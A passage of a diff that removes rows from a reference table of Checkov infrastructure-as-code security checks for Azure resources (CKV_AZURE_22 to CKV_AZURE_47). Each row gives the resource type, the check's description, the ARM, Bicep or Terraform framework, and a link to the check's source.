-| 1599 | CKV_AZURE_22             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Bicep                   | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                                                       |
-| 1600 | CKV_AZURE_22             | resource                         | azurerm_security_center_contact                                                                  | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform               | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py)                                           |
-| 1601 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                                                                                                               | arm                     | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                                                                 |
-| 1602 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                       |
-| 1603 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/auditingSettings                                                           | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                       |
-| 1604 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                                                                                                               | arm                     | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                                                                 |
-| 1605 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                       |
-| 1606 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/databases/auditingSettings                                                 | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                       |
-| 1607 | CKV_AZURE_23             | resource                         | azurerm_mssql_server                                                                             | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform               | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                             |
-| 1608 | CKV_AZURE_23             | resource                         | azurerm_mssql_server_extended_auditing_policy                                                    | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform               | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                             |
-| 1609 | CKV_AZURE_23             | resource                         | azurerm_sql_server                                                                               | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform               | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                             |
-| 1610 | CKV_AZURE_24             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | arm                     | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py)                                                                 |
-| 1611 | CKV_AZURE_24             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Bicep                   | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py)                                                                 |
-| 1612 | CKV_AZURE_24             | resource                         | azurerm_mssql_server                                                                             | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform               | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                             |
-| 1613 | CKV_AZURE_24             | resource                         | azurerm_mssql_server_extended_auditing_policy                                                    | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform               | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                             |
-| 1614 | CKV_AZURE_24             | resource                         | azurerm_sql_server                                                                               | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform               | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                             |
-| 1615 | CKV_AZURE_25             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | arm                     | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                                                       |
-| 1616 | CKV_AZURE_25             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | Bicep                   | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                                                       |
-| 1617 | CKV_AZURE_25             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | Terraform               | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py)                                                           |
-| 1618 | CKV_AZURE_26             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | arm                     | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                                                           |
-| 1619 | CKV_AZURE_26             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | Bicep                   | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                                                           |
-| 1620 | CKV_AZURE_26             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | Terraform               | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py)                                                               |
-| 1621 | CKV_AZURE_27             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | arm                     | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                                                           |
-| 1622 | CKV_AZURE_27             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | Bicep                   | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                                                           |
-| 1623 | CKV_AZURE_27             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | Terraform               | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py)                                               |
-| 1624 | CKV_AZURE_28             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | arm                     | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                                                                 |
-| 1625 | CKV_AZURE_28             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | Bicep                   | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                                                                 |
-| 1626 | CKV_AZURE_28             | resource                         | azurerm_mysql_server                                                                             | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | Terraform               | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py)                                                     |
-| 1627 | CKV_AZURE_29             | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | arm                     | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                                                       |
-| 1628 | CKV_AZURE_29             | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | Bicep                   | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                                                       |
-| 1629 | CKV_AZURE_29             | resource                         | azurerm_postgresql_server                                                                        | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | Terraform               | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py)                                           |
-| 1630 | CKV_AZURE_30             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | arm                     | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                       |
-| 1631 | CKV_AZURE_30             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Bicep                   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                       |
-| 1632 | CKV_AZURE_30             | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform               | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py)                                           |
-| 1633 | CKV_AZURE_30             | resource                         | configurations                                                                                   | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | arm                     | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                       |
-| 1634 | CKV_AZURE_30             | resource                         | configurations                                                                                   | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Bicep                   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                       |
-| 1635 | CKV_AZURE_31             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | arm                     | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                       |
-| 1636 | CKV_AZURE_31             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | Bicep                   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                       |
-| 1637 | CKV_AZURE_31             | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform               | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py)                                           |
-| 1638 | CKV_AZURE_31             | resource                         | configurations                                                                                   | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | arm                     | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                       |
-| 1639 | CKV_AZURE_31             | resource                         | configurations                                                                                   | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | Bicep                   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                       |
-| 1640 | CKV_AZURE_32             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | arm                     | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                           |
-| 1641 | CKV_AZURE_32             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Bicep                   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                           |
-| 1642 | CKV_AZURE_32             | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Terraform               | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py)                               |
-| 1643 | CKV_AZURE_32             | resource                         | configurations                                                                                   | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | arm                     | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                           |
-| 1644 | CKV_AZURE_32             | resource                         | configurations                                                                                   | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Bicep                   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                           |
-| 1645 | CKV_AZURE_33             | resource                         | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings                     | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | arm                     | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)                                                 |
-| 1646 | CKV_AZURE_33             | resource                         | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings                     | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | Bicep                   | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)                                                 |
-| 1647 | CKV_AZURE_33             | resource                         | azurerm_storage_account                                                                          | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | Terraform               | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py)                                     |
-| 1648 | CKV_AZURE_34             | resource                         | Microsoft.Storage/storageAccounts/blobServices/containers                                        | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | arm                     | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                 |
-| 1649 | CKV_AZURE_34             | resource                         | Microsoft.Storage/storageAccounts/blobServices/containers                                        | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Bicep                   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                 |
-| 1650 | CKV_AZURE_34             | resource                         | azurerm_storage_container                                                                        | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Terraform               | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py)                                     |
-| 1651 | CKV_AZURE_34             | resource                         | blobServices/containers                                                                          | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | arm                     | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                 |
-| 1652 | CKV_AZURE_34             | resource                         | blobServices/containers                                                                          | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Bicep                   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                 |
-| 1653 | CKV_AZURE_34             | resource                         | containers                                                                                       | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | arm                     | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                 |
-| 1654 | CKV_AZURE_34             | resource                         | containers                                                                                       | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Bicep                   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                 |
-| 1655 | CKV_AZURE_35             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | arm                     | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py)                                                     |
-| 1656 | CKV_AZURE_35             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Bicep                   | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                             |
-| 1657 | CKV_AZURE_35             | resource                         | azurerm_storage_account                                                                          | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform               | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                         |
-| 1658 | CKV_AZURE_35             | resource                         | azurerm_storage_account_network_rules                                                            | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform               | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                         |
-| 1659 | CKV_AZURE_36             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | arm                     | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py)                                                 |
-| 1660 | CKV_AZURE_36             | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Bicep                   | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                         |
-| 1661 | CKV_AZURE_36             | resource                         | azurerm_storage_account                                                                          | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform               | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                     |
-| 1662 | CKV_AZURE_36             | resource                         | azurerm_storage_account_network_rules                                                            | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform               | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                     |
-| 1663 | CKV_AZURE_37             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | arm                     | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                                                                     |
-| 1664 | CKV_AZURE_37             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | Bicep                   | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                                                                     |
-| 1665 | CKV_AZURE_37             | resource                         | azurerm_monitor_log_profile                                                                      | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | Terraform               | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py)                                                         |
-| 1666 | CKV_AZURE_38             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure audit profile captures all the activities                                                                                                                                                         | arm                     | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                                                           |
-| 1667 | CKV_AZURE_38             | resource                         | Microsoft.Insights/logprofiles                                                                   | Ensure audit profile captures all the activities                                                                                                                                                         | Bicep                   | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                                                           |
-| 1668 | CKV_AZURE_38             | resource                         | azurerm_monitor_log_profile                                                                      | Ensure audit profile captures all the activities                                                                                                                                                         | Terraform               | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py)                                                               |
-| 1669 | CKV_AZURE_39             | resource                         | Microsoft.Authorization/roleDefinitions                                                          | Ensure that no custom subscription owner roles are created                                                                                                                                               | arm                     | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                                                       |
-| 1670 | CKV_AZURE_39             | resource                         | Microsoft.Authorization/roleDefinitions                                                          | Ensure that no custom subscription owner roles are created                                                                                                                                               | Bicep                   | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                                                       |
-| 1671 | CKV_AZURE_39             | resource                         | azurerm_role_definition                                                                          | Ensure that no custom subscription owner roles are created                                                                                                                                               | Terraform               | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py)                                           |
-| 1672 | CKV_AZURE_40             | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that the expiration date is set on all keys                                                                                                                                                       | arm                     | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                                                               |
-| 1673 | CKV_AZURE_40             | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that the expiration date is set on all keys                                                                                                                                                       | Bicep                   | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                                                               |
-| 1674 | CKV_AZURE_40             | resource                         | azurerm_key_vault_key                                                                            | Ensure that the expiration date is set on all keys                                                                                                                                                       | Terraform               | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py)                                                                                   |
-| 1675 | CKV_AZURE_41             | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that the expiration date is set on all secrets                                                                                                                                                    | arm                     | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                                                         |
-| 1676 | CKV_AZURE_41             | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that the expiration date is set on all secrets                                                                                                                                                    | Bicep                   | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                                                         |
-| 1677 | CKV_AZURE_41             | resource                         | azurerm_key_vault_secret                                                                         | Ensure that the expiration date is set on all secrets                                                                                                                                                    | Terraform               | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py)                                                                             |
-| 1678 | CKV_AZURE_42             | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure the key vault is recoverable                                                                                                                                                                      | arm                     | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                                                                   |
-| 1679 | CKV_AZURE_42             | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure the key vault is recoverable                                                                                                                                                                      | Bicep                   | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                                                                   |
-| 1680 | CKV_AZURE_42             | resource                         | azurerm_key_vault                                                                                | Ensure the key vault is recoverable                                                                                                                                                                      | Terraform               | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py)                                                                       |
-| 1681 | CKV_AZURE_43             | resource                         | azurerm_storage_account                                                                          | Ensure Storage Accounts adhere to the naming rules                                                                                                                                                       | Terraform               | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py)                                                                                 |
-| 1682 | CKV_AZURE_44             | resource                         | azurerm_storage_account                                                                          | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | Terraform               | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py)                                                       |
-| 1683 | CKV_AZURE_45             | resource                         | azurerm_virtual_machine                                                                          | Ensure that no sensitive credentials are exposed in VM custom_data                                                                                                                                       | Terraform               | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py)                                                                               |
-| 1684 | CKV_AZURE_47             | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | arm                     | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                                                         |
-| 1685 | CKV_AZURE_47             | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | Bicep                   | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                                                         |
